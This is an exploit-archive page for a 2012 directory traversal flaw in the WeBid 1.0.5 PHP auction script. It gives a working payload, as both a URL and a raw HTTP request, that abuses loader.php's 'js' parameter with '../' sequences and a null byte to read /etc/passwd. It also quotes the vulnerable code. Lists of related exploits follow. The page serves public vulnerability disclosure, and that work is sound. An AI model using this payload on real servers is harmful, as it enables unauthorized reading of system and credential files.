Menu

Search for hundreds of thousands of exploits

"weBid 1.0.5 - Directory Traversal"

Author

Exploit author

loneferret

Platform

Exploit platform

php

Release date

Exploit published date

2012-11-19

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# Author: loneferret of Offensive Security
# Product: WeBid 
# Version: 1.0.4 & 1.0.5 (and maybe older versions)
# Vendor Site: http://www.webidsupport.com
# Software Download: http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.0.5/WeBid-1.0.5.zip/download/download
# Other related vulnerabilities: http://www.exploit-db.com/exploits/22828/

# Tested on: Ubuntu Linux

# Software description:
# WeBid is an open-source auction script package.
# Although still in beta stages WeBid is one of the best open-source solutions 
# for getting an auction site up and running quickly and cheaply.
# Written in the popular scripting language PHP and with a large collection of highly customisable 
# features WeBid is the prefect choice for setting up any auction site.
# Some of it's key features which make WeBid a great choice are: WeBid has an easy to 
# use administration panel; a user friendly installation process, which allows you to have 
# your own auction site set up in minutes; an inbuilt payment system allowing your users to 
# easily pay fees and their purchased items with their favourite payment gateways (these include PayPal, Authorize.Net).
# As well as being incredibly easy to edit to your liking.

# Vulnerability:
# Directory Traversal.

# PoC:
# http://server/path/loader.php?js=../../../../../../../../../../etc/passwd%00.js;

# GET /WeBid/loader.php?js=../../../../../../../../../../etc/passwd%00.js; HTTP/1.1
# Cookie: PHPSESSID=99ec7c29eb7e060d56bb77aa1320f6de; WEBID_ONLINE=eda35dc2ad7782db5dee1543be4daf4c
# Host: 172.16.194.148
# Connection: Keep-alive
# Accept-Encoding: gzip,deflate
# User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
# Accept: */*

# Code loader.php
# if (isset($_GET['js']))
# { 
#       $js = explode(';', $_GET['js']);
#        foreach ($js as $val)
#        {
#                $ext = substr($val, strrpos($val, '.') + 1);
#                if ($ext == 'php')
#                {
#                        if (check_file($val))
#                        {
#                                include $val;
#                        }
#                }
#                elseif ($ext == 'js' || $ext == 'css')
#               {
#                        if (is_file($val))
#                        {
#                                echo file_get_contents($val);
#                                echo "\n";
#                        }
#                }
#       }
# }
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2016-08-16 "Pi-Hole Web Interface 2.8.1 - Persistent Cross-Site Scripting in Whitelist/Blacklist" webapps linux loneferret
2015-12-06 "Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions" local windows loneferret
2013-09-10 "eM Client e-mail client 5.0.18025.0 - Persistent Cross-Site Scripting" remote windows loneferret
2013-08-23 "dreamMail e-mail client 4.6.9.2 - Persistent Cross-Site Scripting" remote windows loneferret
2012-11-21 "PHP Server Monitor - Persistent Cross-Site Scripting" webapps php loneferret
2012-11-19 "weBid 1.0.5 - Directory Traversal" webapps php loneferret
2012-10-10 "ServersCheck Monitoring Software 9.0.12/9.0.14 - Persistent Cross-Site Scripting" webapps multiple loneferret
2012-10-08 "Web Help Desk by SolarWinds - Persistent Cross-Site Scripting" webapps php loneferret
2012-08-23 "op5 Monitoring 5.4.2 - VM Applicance Multiple Vulnerabilities" webapps php loneferret
2012-08-21 "Clipbucket 2.5 - Blind SQL Injection" webapps php loneferret
2012-08-21 "Clipbucket 2.5 - Directory Traversal" webapps php loneferret
2012-08-18 "ManageEngine OpUtils 6.0 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-17 "Jaow CMS 2.3 - Blind SQL Injection" webapps php loneferret
2012-08-15 "Cyclope Employee Surveillance Solution 6.0 6.1.0 6.2.0 - Multiple Vulnerabilities" webapps windows loneferret
2012-08-15 "sphpforum 0.4 - Multiple Vulnerabilities" webapps php loneferret
2012-08-12 "Spytech NetVizor 6.1 - 'services.exe' Denial of Service" dos windows loneferret
2012-08-09 "Cyclope Employee Surveillance Solution 6.0/6.1.0/6.2.0/6.2.1/6.3.0 - SQL Injection" webapps windows loneferret
2012-08-08 "T-dah Webmail Client 3.2.0-2.3 - Persistent Cross-Site Scripting" webapps php loneferret
2012-08-08 "winwebmail server 3.8.1.6 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "afterlogic mailsuite pro (VMware Appliance) 6.3 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "Axigen Mail Server 8.0.1 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "WordPress Plugin mini mail Dashboard widget 1.42 - Persistent Cross-Site Scripting" webapps php loneferret
2012-08-08 "escon supportportal pro 3.0 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "mailenable enterprise 6.5 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "xeams email server 4.4 build 5720 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "mailtraq 2.17.3.3150 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "Alt-N MDaemon free 12.5.4 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "OTRS Open Technology Real Services 3.1.4 - Persistent Cross-Site Scripting" webapps windows loneferret
2012-08-08 "WordPress Plugin postie 1.4.3 - Persistent Cross-Site Scripting" webapps php loneferret
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.